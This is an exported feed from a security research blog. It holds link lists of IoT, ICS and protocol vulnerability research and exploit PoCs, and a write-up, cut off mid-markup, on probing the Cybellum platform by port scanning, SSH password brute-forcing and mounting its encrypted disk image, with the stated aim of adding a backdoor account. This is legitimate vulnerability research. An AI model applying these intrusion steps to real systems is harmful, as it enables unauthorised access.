href="https://mp.weixin.qq.com/s/tRmWsRfF2yRszwSeXws5xg">2022西湖论剑 IoT-AWD 赛题官方 WriteUp (上篇):一号固件&二号固件</a></li><li><a href="https://mp.weixin.qq.com/s/_1uLWXSPEiCFST6dsi0YBA">2022西湖论剑 IoT-AWD 赛题官方 WriteUp (下篇):三号固件</a></li></ul><h2 id="标准"><a href="#标准" class="headerlink" title="标准"></a>标准</h2><ul><li><a href="http://c.gb688.cn/bzgk/gb/showGb?type=online&hcno=BBE3572A88B87C3D92AF6DE2C424E0BB">信息安全技术 物联网安全参考模型及通用要求</a></li><li><a href="https://www.miit.gov.cn/gzcy/yjzj/art/2021/art_de99ecee64884ecda932604c32631b76.html">《物联网基础安全标准体系建设指南》(征求意见稿)</a></li><li><a href="https://www.etsi.org/deliver/etsi_en/303600_303699/303645/02.01.01_60/en_303645v020101p.pdf">EN 303 645 - V2.1.1 - CYBER; Cyber Security for Consumer Internet of Things: Baseline Requirements</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=1C7E6B699CC32335D9E3EA2A288F968F">GB/T 38626-2020 信息安全技术 智能联网设备口令保护指南</a></li></ul><h2 id="站点"><a href="#站点" class="headerlink" title="站点"></a>站点</h2><ul><li><a href="https://wiki.recessim.com/view/Main_Page">RECESSIM</a></li></ul><h2 id="书籍"><a href="#书籍" class="headerlink" title="书籍"></a>书籍</h2><ul><li><a href="https://nostarch.com/open-circuits">Open Circuits: The Inner Beauty of Electronic Components</a></li><li><a href="https://embeddedsecurity.io/introduction">Embedded Systems Security and TrustZone</a></li><li><a href="https://nostarch.com/hardwarehacking">The Hardware Hacking Handbook</a></li></ul>]]></content>
<summary type="html"><h2 id="2024"><a href="#2024" class="headerlink" title="2024"></a>2024</h2><ul>
<li><a href="https://voidstarsec.com/blog/jtag-pifex">JTAG H</summary>
<category term="IOT" scheme="http://delikely.github.io/tags/IOT/"/>
</entry>
<entry>
<title>工控安全 漏洞收集</title>
<link href="http://delikely.github.io/2099/01/01/ICS-Vulns/"/>
<id>http://delikely.github.io/2099/01/01/ICS-Vulns/</id>
<published>2099-01-01T10:00:00.000Z</published>
<updated>2023-04-28T12:42:44.195Z</updated>
<content type="html"><![CDATA[<ul><li><a href="https://www.forescout.com/resources/l1-lateral-movement-report">Deep Lateral Movement in OT Networks: When Is a Perimeter Not a Perimeter?</a></li><li><a href="https://claroty.com/team82/research/hacking-ics-historians-the-pivot-point-from-it-to-ot">Hacking ICS Historians: The Pivot Point from IT to OT</a></li><li><a href="https://claroty.com/team82/research/team82-releases-homegrown-opc-ua-network-fuzzer-based-on-boofuzz">Team82 Releases Homegrown OPC UA Network Fuzzer Based on boofuzz</a></li><li><a href="https://redballoonsecurity.com/siemens-discovery/">Critical Architectural Vulnerabilities in Siemens SIMATIC S7-1500 Series Allow for Bypass of All Protected Boot Features</a></li><li><a href="https://claroty.com/team82/research/the-race-to-native-code-execution-in-plcs-using-rce-to-uncover-siemens-simatic-s7-1200-1500-hardcoded-cryptographic-keys">The Race to Native Code Execution in PLCs: Using RCE to Uncover Siemens SIMATIC S7-1200/1500 Hardcoded Cryptographic Keys</a></li><li><a href="https://claroty.com/team82/research/jumping-nat-to-shut-down-electric-devices">Bypassing NAT to Attack Dataprobe iBoot-PDUs</a></li><li><a href="https://claroty.com/team82/research/exploiting-vulnerabilities-in-the-ot-cloud-era">Top-Down and Bottom-Up: Exploiting Vulnerabilities In the OT Cloud Era</a></li><li><a href="https://www.armis.com/research/modipwn/">ModiPwn - can allow attackers to bypass authentication mechanisms which can lead to native remote-code-execution on vulnerable PLCs</a></li><li><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vulnerabilities-in-schneider-electric-somachine-and-m221-plc/">Vulnerabilities in Schneider Electric SoMachine and M221 PLC (CVE-2017-6034 and CVE-2020-7489)</a></li><li><a href="https://i.blackhat.com/USA-19/Thursday/us-19-Bitan-Rogue7-Rogue-Engineering-Station-Attacks-On-S7-Simatic-PLCs-wp.pdf">Rogue7: Rogue Engineering-Station attacks on S7 Simatic PLCs</a> <a href="https://www.venustech.com.cn/article/1/11639.html">分析与复现</a></li><li><a href="https://www.rapid7.com/research/report/investigating-can-bus-network-integrity-in-avionics-systems/"> Investigating CAN Bus Network Integrity in Avionics Systems </a></li><li><a href="https://armis.com/urgent11/">URGENT/11:11 Zero Day Vulnerabilities Impacting VxWorks</a></li><li><a href="https://go.armis.com/hubfs/White-papers/Urgent11%20Technical%20White%20Paper.pdf">URGENT/11:Technical White Paper</a></li></ul><h2 id="Router"><a href="#Router" class="headerlink" title="Router"></a>Router</h2><ul><li><a href="https://sec-consult.com/en/blog/advisories/multiple-vulnerabilities-in-wago-852-industrial-managed-switch-series-cve-2019-12550-cve-2019-12549/">WAGO工业交换机多个漏洞:CVE-2019-12550和CVE-2019-12549</a></li><li><a href="https://medium.com/@bertinjoseb/four-faith-industrial-routers-command-injection-rce-reverse-shell-121c4dedb0d8">Four Faith Industrial routers Command Injection RCE Reverse Shell</a></li></ul><h2 id="SCADA"><a href="#SCADA" class="headerlink" title="SCADA"></a>SCADA</h2><ul><li><a href="https://www.tenable.com/blog/tenable-research-advisory-critical-schneider-electric-indusoft-web-studio-and-intouch-machine">Critical Schneider Electric InduSoft Web Studio and InTouch Machine Edition Vulnerability (CVE-2018-8840)</a></li><li><a href="https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password">mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password</a></li></ul><h2 id="Protocol"><a href="#Protocol" class="headerlink" title="Protocol"></a>Protocol</h2><ul><li><a href="https://claroty.com/2021/04/15/blog-research-fuzzing-and-pring/">The OpENer EtherNet/IP stack Multiple Vulnerabilities</a></li></ul><h2 id="Medical"><a href="#Medical" class="headerlink" title="Medical"></a>Medical</h2><ul><li><a href="https://www.armis.com/research/pwnedpiper/">PwnedPiper - Armis</a></li></ul>]]></content>
<summary type="html"><ul>
<li><a href="https://www.forescout.com/resources/l1-lateral-movement-report">Deep Lateral Movement in OT Networks: When Is a Perimeter </summary>
<category term="ICS" scheme="http://delikely.github.io/tags/ICS/"/>
</entry>
<entry>
<title>协议安全 漏洞收集</title>
<link href="http://delikely.github.io/2099/01/01/protocol-Vulns/"/>
<id>http://delikely.github.io/2099/01/01/protocol-Vulns/</id>
<published>2099-01-01T09:00:00.000Z</published>
<updated>2024-05-26T16:27:10.089Z</updated>
<content type="html"><![CDATA[<h2 id="TCP-IP"><a href="#TCP-IP" class="headerlink" title="TCP/IP"></a>TCP/IP</h2><ul><li><a href="https://www.synacktiv.com/publications/exploiting-a-remote-heap-overflow-with-a-custom-tcp-stack.html">Exploiting a remote heap overflow with a custom TCP stack</a></li><li><a href="https://www.forescout.com/blog/new-critical-vulnerabilities-found-on-nucleus-tcp-ip-stack/">NUCLEUS:13 - New Critical Vulnerabilities Found on Nucleus TCP/IP Stack</a></li><li><a href="https://www.forescout.com/blog/numberjack-forescout-research-labs-finds-nine-isn-generation-vulnerabilities-affecting-tcpip-stacks/">NUMBER:JACK - Forescout Research Labs Finds Nine ISN Generation Vulnerabilities Affecting TCP/IP Stacks</a></li><li><a href="https://www.forescout.com/research-labs/infra-halt/">INFRA:HALT - 14 new vulnerabilities affecting closed source TCP/IP stack NicheStack</a></li><li><a href="https://tsuname.io/">tsuNAME:Vulnerability that can be used to DDoS DNS</a></li><li><a href="https://www.forescout.com/research-labs/namewreck/">NAME:WREACK nine new vulnerabilities affecting four popular TCP/IP stacks</a></li><li><a href="https://www.forescout.com/research-labs/amnesia33/">AMNESIA:33 open source TCP/IP stacks (uIP, FNET, picoTCP and Nut/Net)</a> <a href="https://www.forescout.com/company/resources/amnesia33-how-tcp-ip-stacks-breed-critical-vulnerabilities-in-iot-ot-and-it-devices/">White Paper</a></li><li><a href="https://raccoon-attack.com/">TLS Raccoon Attack</a></li><li><a href="https://www.jsof-tech.com/ripple20/">Ripple20: 19 Zero-Day Vulnerabilities Amplified by the Supply Chain</a></li><li><a href="https://callstranger.com/">CallStranger: Data Exfiltration & Reflected Amplified TCP DDOS & Port Scan via UPnP SUBSCRIBE Callback</a> <a href="https://www.venustech.com.cn/article/1/11863.html">分析</a></li><li><a href="https://www.armis.com/urgent11/">URGENT/11: 11 Zero Day Vulnerabilities Impacting VxWorks</a></li><li><a href="https://www.jsof-tech.com/disclosures/dnspooq/">DNSpooq: 7 vulnerabilities in Dnsmasq</a></li><li><a href="https://blog.zimperium.com/freertos-tcpip-stack-vulnerabilities-details/">FreeRTOS TCP/IP Stack Vulnerabilities</a></li></ul><h2 id="Blutooth"><a href="#Blutooth" class="headerlink" title="Blutooth"></a>Blutooth</h2><ul><li><a href="https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth">CVE Lists: bluetooth</a></li><li><a href="https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing">CVE-2023-45866: Exploiting 0-click Android Bluetooth vulnerability to inject keystrokes without pairing</a></li><li><a href="https://github.com/marcnewlin/hi_my_name_is_keyboard/tree/main">Keystroke Injection</a></li><li><a href="https://francozappa.github.io/post/2023/bluffs-ccs23/">BLUFFS: Bluetooth Forward and Future Secrecy Attacks and Defenses</a></li><li><a href="https://dl.acm.org/doi/10.1145/3548606.3560668">Blacktooth: Blacktooth: Breaking through the Defense of Bluetooth in Silence</a></li><li><a href="https://www.ndss-symposium.org/ndss-paper/badbluetooth-breaking-android-security-mechanisms-via-malicious-bluetooth-peripherals/">BadBluetooth: Breaking Android Security Mechanisms via Malicious Bluetooth Peripherals</a> <a href="https://www.bilibili.com/video/BV1EV411y7Cp">Video</a></li><li><a href="https://github.com/ElevenPaths/DirtyTooth-RaspberryPi">DirtyTooth-RaspberryPi: Exploit the hack for IOS 11.1.2 and earlier to collect leaked information.</a> <a href="https://www.hacking.land/2017/08/la-implementaci-de-dirtytooth-hack-para.html?m=1">More</a> <a href="https://www.exploit-db.com/docs/english/42430-dirtytooth-extracting-vcard-data-from-bluetooth-ios-profiles.pdf">Whitepaper</a></li><li><a href="https://github.com/Charmve/BLE-Security-Attack-Defence">BLE-Security-Attack-Defence: The dangers of BLE implementations: Unveiling zero day vulnerabilities and security flaws in modern Bluetooth LE stacks.</a></li><li><a href="https://hexhive.epfl.ch/BLURtooth/">BLURtooth: BLUR attacks</a></li><li><a href="https://asset-group.github.io/disclosures/braktooth/">BRAKTOOTH: Causing Havoc on Bluetooth Link Manager</a></li><li><a href="https://francozappa.github.io/about-bias/">BIAS: Bluetooth Impersonation AttackS</a></li><li><a href="https://github.com/Matheus-Garbelini/sweyntooth_bluetooth_low_energy_attacks">SweynTooth: Unleashing Mayhem over Bluetooth Low Energy</a></li><li><a href="https://knobattack.com/">Key Negotiation of Bluetooth Attack: Breaking Bluetooth Security</a> <a href="https://francozappa.github.io/project/knob/">More</a></li><li><a href="https://www.armis.com/blueborne/">BlueBorne</a> <a href="https://github.com/ojasookert/CVE-2017-0785">POC</a></li><li><a href="https://www.armis.com/bleedingbit/">BLEEDINGBIT: THE HIDDEN ATTACK SURFACE WITHIN BLE CHIPS</a></li><li><a href="https://www.ndss-symposium.org/ndss-paper/badbluetooth-breaking-android-security-mechanisms-via-malicious-bluetooth-peripherals/">BadBluetooth: Breaking Android Security Mechanisms via Malicious Bluetooth Peripherals</a></li><li><a href="https://www.blackhat.com/us-20/briefings/schedule/#stealthily-access-your-android-phones-bypass-the-bluetooth-authentication-19993">Stealthily Access Your Android Phones: Bypass the Bluetooth Authentication</a> <a href="https://www.youtube.com/watch?v=6J3weqoiads">Video</a></li></ul><h2 id="WiFi"><a href="#WiFi" class="headerlink" title="WiFi"></a>WiFi</h2><ul><li><a href="https://www.fragattacks.com/">FragAttacks (fragmentation and aggregation attacks)</a></li><li><a href="https://packetstormsecurity.com/files/156809/Broadcom-Wi-Fi-KR00K-Proof-Of-Concept.html">Broadcom Wi-Fi KR00K Proof Of Concept</a></li><li><a href="https://www.welivesecurity.com/wp-content/uploads/2020/02/ESET_Kr00k.pdf">KR00K - CVE-2019-15126</a></li><li><a href="https://www.krackattacks.com/">Key Reinstallation Attacks</a></li><li><a href="https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html">Over The Air: Exploiting Broadcom’s Wi-Fi Stack</a></li></ul><h2 id="UWB"><a href="#UWB" class="headerlink" title="UWB"></a>UWB</h2><ul><li><a href="https://arxiv.org/abs/2111.05313">Ghost Peak: Practical Distance Reduction Attacks Against HRP UWB Ranging</a></li></ul><h2 id="NFC"><a href="#NFC" class="headerlink" title="NFC"></a>NFC</h2><ul><li><a href="https://github.com/Iskuri/PN553-Signature-Bypass">A tool that bypasses PN553 signature protection</a></li><li><a href="https://www.pentestpartners.com/security-blog/breaking-the-nfc-chips-in-tens-of-millions-of-smart-phones-and-a-few-pos-systems/">Breaking the NFC chips in tens of millions of smart phones, and a few PoS systems</a></li></ul><h2 id="ICS"><a href="#ICS" class="headerlink" title="ICS"></a>ICS</h2><ul><li><a href="https://claroty.com/2021/04/15/blog-research-fuzzing-and-pring/">The OpENer EtherNet/IP stack Multiple Vulnerabilities</a></li></ul><h2 id="CHIPS"><a href="#CHIPS" class="headerlink" title="CHIPS"></a>CHIPS</h2><ul><li><a href="https://www.vdoo.com/blog/realtek-rtl8195a-vulnerabilities-discovered">Major Vulnerabilities discovered and patched in Realtek RTL8195A Wi-Fi Module</a></li></ul>]]></content>
<summary type="html"><h2 id="TCP-IP"><a href="#TCP-IP" class="headerlink" title="TCP/IP"></a>TCP/IP</h2><ul>
<li><a href="https://www.synacktiv.com/publications/</summary>
</entry>
<entry>
<title>值得一看 漏洞收集</title>
<link href="http://delikely.github.io/2099/01/01/genius-vulns/"/>
<id>http://delikely.github.io/2099/01/01/genius-vulns/</id>
<published>2099-01-01T08:00:00.000Z</published>
<updated>2023-04-07T03:47:51.434Z</updated>
<content type="html"><![CDATA[<h2 id="有趣的漏洞"><a href="#有趣的漏洞" class="headerlink" title="有趣的漏洞"></a>有趣的漏洞</h2><ul><li><a href="https://www.bleepingcomputer.com/news/microsoft/windows-11-snipping-tool-privacy-bug-exposes-cropped-image-content/">Windows 11 Snipping Tool privacy bug exposes cropped image content</a></li><li><a href="https://blog.luitjes.it/posts/injectgpt-most-polite-exploit-ever/">InjectGPT: the most polite exploit ever</a></li><li><a href="https://varun.ch/history">Retrieving your browsing history through a CAPTCHA</a></li><li><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/from-stored-xss-to-rce-using-beef-and-elfinder-cve-2021-45919/">CVE-2021-45919: From Stored XSS to Code Execution using SocEng, BeEF and elFinder</a></li><li><a href="https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/">Exploiting URL Parsing Confusion Vulnerabilities</a></li><li><a href="https://portswigger.net/research/ublock-i-exfiltrate-exploiting-ad-blockers-with-css">uBlock, I exfiltrate: exploiting ad blockers with CSS</a></li><li><a href="https://trojansource.codes/">Trojan Source Attacks</a></li><li><a href="https://cyberxplore.medium.com/how-we-are-able-to-hack-any-company-by-sending-message-including-facebook-google-microsoft-b7773626e447">How We Are Able To Hack Any Company By Sending Message - US $20000 Bounty CVE-2021-34506(翻译功能 uXSS)</a> <a href="https://www.youtube.com/watch?v=XfTN7fPtB1s">Video</a></li><li><a href="https://samcurry.net/hacking-apple/">We Hacked Apple for 3 Months: Here’s What We Found</a></li><li><a href="https://www.wizer-training.com/blog/copy-paste">How To Get Hacked By Accidentally Copy Pasting</a></li></ul><h3 id="软链接的妙用"><a href="#软链接的妙用" class="headerlink" title="软链接的妙用"></a>软链接的妙用</h3><ul><li><a href="https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE/">How to get root on Ubuntu 20.04 by pretending nobody’s /home</a></li></ul><h3 id="目录穿越的妙用"><a href="#目录穿越的妙用" class="headerlink" title="目录穿越的妙用"></a>目录穿越的妙用</h3><ul><li><a href="https://github.com/ea/bosch_headunit_root">bosch headunit root</a></li></ul><h2 id="影响重大的漏洞"><a href="#影响重大的漏洞" class="headerlink" title="影响重大的漏洞"></a>影响重大的漏洞</h2><ul><li><a href="https://dirtypipe.cm4all.com/">Dirty Pipe:A vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files(CVE-2022-0847 提权) </a> <a href="https://haxx.in/files/dirtypipez.c">EXP</a></li><li><a href="https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034">PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) </a> <a href="https://haxx.in/files/blasty-vs-pkexec.c">POC</a></li><li><a href="https://logging.apache.org/log4j/2.x/security.html">CVE-2021-44228: Log4j2 远程代码执行漏洞</a> <a href="https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce">POC</a> <a href="https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/">CVE-2021-44832</a></li><li><a href="https://github.com/hhroot/2021_Hvv">2021 Hvv POC 合集</a></li><li><a href="https://proxylogon.com/">ProxyLogon: pre-authenticated RCE vulnerability on Microsoft Exchange Server</a></li><li><a href="https://github.com/jas502n/CVE-2020-5902">CVE-2020-5902: F5 BIG-IP远程代码执行漏洞</a></li><li><a href="https://blog.csdn.net/sun1318578251/article/details/105728541/">通达OA2017/V11.X~V11.5OA 前台任意用户登录漏洞 文件上传漏洞</a> <a href="https://github.com/NS-Sp4ce/TongDaOA-Fake-User">任意用户登录POC</a> <a href="https://github.com/clm123321/tongda_oa_rce">文件上传POC</a></li><li><a href="https://baijiahao.baidu.com/s?id=1637627363255074344&wfr=spider&for=pc">致远A8 OA系统任意文件上传getshell漏洞分析报告</a> <a href="https://paper.seebug.org/964/">致远 OA 变种 BASE64 算法的加解密方法</a></li></ul><h2 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h2><ul><li><a href="https://www.synacktiv.com/sites/default/files/2023-03/Synacktiv-Grails-Spring-Security-CVE-2022-41923.pdf">CVE-2022-41923 Improper Privilege Management in Grails Spring Security Core <= 5.1.0</a></li><li><a href="https://bugs.xdavidhu.me/google/2022/11/10/accidental-70k-google-pixel-lock-screen-bypass/">Accidental $70k Google Pixel Lock Screen Bypass</a></li><li><a href="https://halove23.blogspot.com/2021/09/zdi-21-1053-bypassing-windows-lock.html">Bypassing Windows Lock Screen</a></li><li><a href="https://blog.zapb.de/stm32f1-exceptional-failure/">Exception(al) Failure - Breaking the STM32F1 Read-Out Protection</a></li><li><a href="https://twitter.com/samwcyo/status/1597695281881296897">A vulnerability affecting Hyundai and Genesis vehicles where we could remotely control car</a></li><li><a href="https://raelize.com/blog/espressif-systems-esp32-bypassing-flash-encryption/">CVE-2020-15048 | Espressif ESP32: Bypassing Flash Encryption</a></li><li><a href="https://raelize.com/blog/espressif-esp32-bypassing-encrypted-secure-boot-cve-2020-13629/">CVE-2020-13629 | Espressif ESP32: Bypassing Encrypted Secure Boot</a></li><li><a href="https://infosecwriteups.com/how-i-got-10-000-from-github-for-bypassing-filtration-of-html-tags-db31173c8b37">How I Got $10,000 From GitHub For Bypassing Filtration oF HTML tags</a></li></ul><h2 id="Escape"><a href="#Escape" class="headerlink" title="Escape"></a>Escape</h2><ul><li><a href="https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/">Breaking out of Docker via runC – Explaining CVE-2019-5736</a></li><li><a href="https://www.synacktiv.com/publications/escaping-from-bhyve.html">Escaping from bhyve</a></li></ul><h2 id="Browser"><a href="#Browser" class="headerlink" title="Browser"></a>Browser</h2><ul><li><a href="https://starlabs.sg/blog/2022/12-the-hole-new-world-how-a-small-leak-will-sink-a-great-browser-cve-2021-38003/">TheHole New World - how a small leak will sink a great browser (CVE-2021-38003)</a></li><li><a href="https://jhalon.github.io/chrome-browser-exploitation-1/">Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals</a></li></ul><h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><ul><li><a href="https://www.trellix.com/en-us/about/newsroom/stories/research/tarfile-exploiting-the-world.html">Tarfile: Exploiting the World With a 15-Year-Old Vulnerability</a></li><li><a href="https://blog.trailofbits.com/2022/10/25/sqlite-vulnerability-july-2022-library-api/">Stranger Strings: An exploitable flaw in SQLite</a></li></ul>]]></content>
<summary type="html"><h2 id="有趣的漏洞"><a href="#有趣的漏洞" class="headerlink" title="有趣的漏洞"></a>有趣的漏洞</h2><ul>
<li><a href="https://www.bleepingcomputer.com/news/micro</summary>
</entry>
<entry>
<title>Take a glance of browser, I find Cybellum RCE</title>
<link href="http://delikely.github.io/2024/02/18/Cybellum-RCE/"/>
<id>http://delikely.github.io/2024/02/18/Cybellum-RCE/</id>
<published>2024-02-18T07:00:00.000Z</published>
<updated>2024-02-20T01:24:29.880Z</updated>
<content type="html"><![CDATA[<h2 id="Take-a-glance-of-browser-I-find-Cybellum-RCE"><a href="#Take-a-glance-of-browser-I-find-Cybellum-RCE" class="headerlink" title="Take a glance of browser, I find Cybellum RCE"></a>Take a glance of browser, I find Cybellum RCE</h2><p><img src="db928a6e2257e36f037d7028ca69982.png" alt=""><br>One day I visited my friend @Imweekend. He was working on scanning the vulnerability of IVI firmware with Cybellum(The Product Security Platform). This Platform is used to manage and validate SBOMs, detect and prioritize vulnerabilities, comply with regulations and manage incident response. This Platform is based on Browser/Server Architecture. </p><h3 id="About-Vendor"><a href="#About-Vendor" class="headerlink" title="About Vendor"></a>About Vendor</h3><p><a href="https://cybellum.com/">Cybellum</a> is a company that provides product security solutions for device manufacturers in the automotive, medical and industrial sectors. It helps them manage cybersecurity and cyber compliance across the entire product lifecycle, from SBOM management to vulnerability management to incident response. LG Electronics acquired Cybellum, in 2021.</p><p>This platform is widely used throughout the world by OEMs(BMW,Nissan,Grate Wall etc.) 、Tier 1(Denso, Mobileye, Harmam etc.)、The Third Party Inspection Institution(CATARC, CAERI,CSTC,CEPREI etc.)</p><p><img src="image-20231226013456489.png" alt="image-20231226013456489" style="zoom:50%;" /></p><h3 id="Interesting-status"><a href="#Interesting-status" class="headerlink" title="Interesting status"></a>Interesting status</h3><p>With a glance at the web page, which caught my eyes. </p><p><img src="image-20230528184442715.png" alt="image-20230528184442715"></p><p><code>192.168.1.102:29000/api/tasks?access_key=123</code> return task status with exception <code>run—subprocess bash /tmp/bffed366—d3dl—4f1e-bc65—9a839b714add/start. sh</code> It looks like a normal task exception which execute failed, but the type <code>excute_rce</code> is interesting. RCE is the abbreviation of “remote code execute”, RCE is a type of security vulnerability that allows attackers to run arbitrary code on a remote machine. RCE on everything is a security researcher’s dream.</p><p>As a security researcher, we are sensitive and curious about the world. <code>excute_rce</code> sense looks like a backdoor api, so we decide to dig into it deeper. Cybellum is a commercial product. It’s a black box to us. We require more information to investigate whether it is backdoor or not.</p><h3 id="Regcongize-service"><a href="#Regcongize-service" class="headerlink" title="Regcongize service"></a>Regcongize service</h3><p>First use nmap to find whether other port is open.</p><p><img src="image-20240106165344944.png" alt="image-20240106165344944"></p><p>Surprisingly, as a commercial product’s 22 (SSH) port is kept open. Login to the server requires a password. Failed to log in with the default password which is used on Web services of 443(https). Later, we use the hydra to crack the password with some wordlist, but still can’t get the correct password. </p><p><img src="image-20240106170230648.png" alt="image-20240106170230648"></p><p>Come back to view other ports. Some of them are web applications without url path, and we got a lot of error.</p><p><img src="image-20240106172132756.png" alt="image-20240106172132756"></p><h3 id="Deployment-method"><a href="#Deployment-method" class="headerlink" title="Deployment method"></a>Deployment method</h3><p>It’s hard to make progress at outer, so we try to extract firmware for further analysis. First we need to figure out the system deployment method.</p><p>We found the image named cybellum.qcow2. Qcow2 is a file format for disk image files used by QEMU. It is an updated version of the Qcow2 format and supports AES encryption.</p><p>Now we know Cybellum uses QEMU to serve the platform. Next step is to modify the qcow2 disk image and add a backdoor account for SSH service. </p><h3 id="Mount-qcow2-disk-image"><a href="#Mount-qcow2-disk-image" class="headerlink" title="Mount qcow2 disk image"></a>Mount qcow2 disk image</h3><p>qemu-nbd is QEMU Disk Network Block Device Server, which can be used to mount qcow2 image.</p><ol><li><p>Enable NBD on the Host</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">modprobe nbd max_part=8 </span><br></pre></td></tr></table></figure></li><li><p>Connect the QCOW2 as network block device</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qemu-nbd -c /dev/nbd1 ./cybellum.qcow2 </span><br></pre></td></tr></table></figure></li><li><p>Find The Virtual Machine Partitions</p></li></ol><p><img src="image-20240106174138633.png" alt="image-20240106174138633"></p><p> Partition is 1M BOST boot; Partition /dev/nbd1p2 ;the biggest partition is /dev/nbd1p3.</p><ol start="4"><li><p>Mount the partition from the VM</p><p>mount /dev/nbd1p3 failed, because <code>unknown filesystem type 'crypto_LUKS'</code>. According to the error information <code>crypto_LUKS show</code> is /dev/nbd1p3 is crypt.</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">└─<span class="comment"># mount /dev/nbd1p3 /media/file </span></span><br><span class="line">mount: /media/file: unknown filesystem <span class="built_in">type</span> <span class="string">'crypto_LUKS'</span>.</span><br><span class="line"> dmesg(1) may have more information after failed mount system call.</span><br></pre></td></tr></table></figure><p>cryptsetup can be used to mount encryption partition. Without a password,we are stagnant again.</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># modprobe dm-crypt dm-mod</span><br><span class="line"># cryptsetup open /dev/nbd1p3 test</span><br><span class="line">Enter passphrase for /dev/nbd1p3: </span><br><span class="line"></span><br></pre></td></tr></table></figure></li><li><p>find encryption parameters</p><p>Before find a key,we need to know the encryption algorithm and key length.<code>cryptsetup luksDump</code> can help us to dump the header information of a LUKS device. <code>cryptsetup luksDump /dev/nbd1p3</code> show ciper is aes-xts-plain64、key is 512 bits.</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">LUKS header information</span><br><span class="line">Version: 2</span><br><span class="line">Epoch: 5</span><br><span class="line">Metadata area: 16384 [bytes]</span><br><span class="line">Keyslots area: 16744448 [bytes]</span><br><span class="line">UUID: 871011b5-f0cd-47d7-946c-a1dc6c356359</span><br><span class="line">Label: (no label)</span><br><span class="line">Subsystem: (no subsystem)</span><br><span class="line">Flags: (no flags)</span><br><span class="line"></span><br><span class="line">Data segments:</span><br><span class="line"> 0: crypt</span><br><span class="line">trueoffset: 16777216 [bytes]</span><br><span class="line">truelength: (whole device)</span><br><span class="line">truecipher: aes-xts-plain64</span><br><span class="line">truesector: 512 [bytes]</span><br><span class="line"></span><br><span class="line">Keyslots:</span><br><span class="line"> 1: luks2</span><br><span class="line">trueKey: 512 bits</span><br><span class="line">truePriority: normal</span><br><span class="line">trueCipher: aes-xts-plain64</span><br><span class="line">trueCipher key: 512 bits</span><br><span class="line">truePBKDF: argon2i</span><br><span class="line">trueTime cost: 4</span><br><span class="line">trueMemory: 945543</span><br><span class="line">trueThreads: 4</span><br><span class="line">trueSalt: 74 e4 f0 7d 4c 6f 9e dc 4a e4 6c 74 13 7c fa 90 </span><br><span class="line">true 37 b4 39 2e 9a 51 71 92 da c5 c8 c7 d7 a0 d7 5e </span><br><span class="line">trueAF stripes: 4000</span><br><span class="line">trueAF <span class="built_in">hash</span>: sha256</span><br><span class="line">trueArea offset:290816 [bytes]</span><br><span class="line">trueArea length:258048 [bytes]</span><br><span class="line">trueDigest ID: 0</span><br><span class="line">Tokens:</span><br><span class="line">Digests:</span><br><span class="line"> 0: pbkdf2</span><br><span class="line">trueHash: sha256</span><br><span class="line">trueIterations: 121362</span><br><span class="line">trueSalt: e9 a4 5f f5 b0 04 70 68 fd 9e d0 1e 10 90 05 18 </span><br><span class="line">true e0 64 03 b4 c2 56 e5 8e 6e 2a 91 d8 c6 6e 66 ed </span><br><span class="line">trueDigest: 22 62 2a 43 6c f5 1b 36 88 b2 fb 7c ae 86 39 c1 </span><br><span class="line">true b2 27 a7 ab 94 12 d3 72 9b 24 e8 fa a1 e9 f9 c2 </span><br><span class="line"> </span><br></pre></td></tr></table></figure></li></ol><p> When I delicated to find the AES 512 key, @Imweekend found another way to get access to the system.</p><p> <em>NOTICE: decrypt and modify image see next blog.</em></p><h3 